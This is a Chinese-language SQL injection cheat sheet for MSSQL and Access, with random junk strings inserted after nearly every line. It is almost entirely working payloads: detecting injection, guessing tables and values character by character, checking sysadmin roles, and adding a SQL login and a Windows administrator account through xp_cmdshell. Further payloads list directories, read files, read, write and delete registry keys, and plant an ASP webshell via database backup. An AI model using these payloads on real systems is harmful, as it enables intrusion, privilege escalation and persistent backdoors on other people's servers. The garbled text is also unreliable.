1.判断是否有注入;and 1=1 ;and 1=2 U4`6S43ki
2.初步判断是否是mssql ;and user>0 x -CTMKX
fL-lx-~
3.注入参数是字符'and [查询条件] and ''=' zY_?$9l0
mk*r^k`a
4.搜索时没过滤参数的'and [查询条件] and '%25'=' <!@*2/Q]J]
39Nz>Nu:
5.判断数据库系统 BJA&{DMHm
]/31@RT
;and (select count(*) from sysobjects)>0 mssql vZhC_G+tGd
.tRp
;and (select count(*) from msysobjects)>0 access ?w/i;pp<,
V\Q=EsHj
CYkU-
F_C7S
6.猜数据库 ;and (select Count(*) from [数据库名])>0 P D,s,A
\_GG6
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Vz4/u|gt
,v^A;,q
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 s0EF{2<F
OGA_3|[S
9.(1)猜字段的ascii值(access) .AHf]X0
al#BfcZW
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 =17d7#-
0<ze'FbV]
(2)猜字段的ascii值(mssql) K+WbxovXU
w8(8n&5
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 jg)+]r/hS
9x4%M&<Z9a
10.测试权限结构(mssql) Mk=M)d`
0[\sz>@
>]/RlW[
0Wd2Z-I
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- C_5o&O8Bc
Ufw_GYxan
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- kh7RQbNY<I
([g[\c,H
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- kJP`C\4}f
E}qW'
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- d1[;~)
U!y GZEU"[
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ;,WI_iP(w
/-FvC^Fj
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- MP
LgE.n
FqWW[Bgd
;and 1=(select IS_MEMBER('db_owner'));-- Jam&Rj,
}Mv$Up
u)X]]6YJ
+Oxw?`I$
11.添加mssql和系统的帐户 0gevn
-!bfxbP
;exec master.dbo.sp_addlogin username;-- ScCp88KpFI
;exec master.dbo.sp_password null,username,password;-- 6y0CEly>3#
4LY$;J;2
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- OTy{:ID
":I@>t{H*
;exec master.dbo.xp_cmdshell 'net user username password R(t1Ei.-?
$c1zMkY)u
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- \86:f<)P
2h;#BJ))
;exec master.dbo.xp_cmdshell 'net user username password /add';-- -f&m4J} E
#TUuk
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- kq$0~lNI$
g6D7Y<}d
uUIjntSF(
1#w'<}h#U
12.(1)遍历目录 k00&+C
E[=#Rw!*
;create table dirs(paths varchar(100), id int) YqQAogyh
O)FkpZc@9c
;insert dirs exec master.dbo.xp_dirtree 'c:\' evQk,;pIm
F!RzF7h1
;and (select top 1 paths from dirs)>0 IE*5p6IM~
~[Fh+t(Y
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) {SRv=g
Efa3{
7>{
ABIQi[A
qx'F9I
(2)遍历目录 #;(Q \
yDORL|
E'
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ?PSJQ3BC|
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 Tfytc$aQ
:OKU@l|
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 7`P1=`..
@{ CP18~:
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 UCBx?9O/0
$/)0iL{0
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 KvvG
H-]
(?vKe5
Z~{0x#?4%
4#Rq}/h
13.mssql中的存储过程 ETQL,t9m
Xw'Y
&!z
xp_regenumvalues 注册表根键, 子键 m=#<
L?&Trq7i
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 CBu$8]9=
U|jip1\
xp_regread 根键,子键,键值名 +ab#2~,)
4|INy=<"t
;exec xp_regread E]gy5y
b8O }XB
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 1,Uf-i
"8R\!i.
xp_regwrite 根键,子键, 值名, 值类型, 值 _08y; _S
5M=
S7B3=
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 &eIwlynm
)J(@e4;Rv
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Y![//tg
3FQXp
xp_regdeletevalue 根键,子键,值名 ~E3"s
A4IPd
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 WW3! ,ln_
OlcWptM$
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 (U_dPf
~|R/w%*C
(@3?JJ]1
r34 GO1d
14.mssql的backup创建webshell J]gtgt^
ZK?:w^Z
use model j=V2~
xA6
Lv<)Dur0K
create table cmd(str image); _n12Wx{
FX&)~)
insert into cmd(str) values (''); lfe^_`ij(+
e)Pm{:E
backup database model to disk='c:\l.asp'; 'l41];_
Vd+5an?
G&,2>qxKR
ibxtrt=
15.mssql内置函数 NVG`XL
Zoyo:vv&
;and (select @@version)>0 获得Windows的版本号 jx-8%dxtZ
k}908%w
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 0$I!\y\
mF@DO$
;and (select user_name())>0 爆当前系统的连接用户 B[{Ie
G'
;o?Wn=J
;and (select db_name())>0 得到当前连接的数据库 l
EsE]f
1IeB_t
n,o;:c
idGhWV'
16.简洁的webshell J%ue{PL7
Ku<_N]9
use model &k0c|q]
zE_t(B(Q
create table cmd(str image); gLQbA$gB
P#x]3j]
insert into cmd(str) values (''); *h Bo,
d
A' h7D
backup database model to disk='g:\wwwtest\l.asp';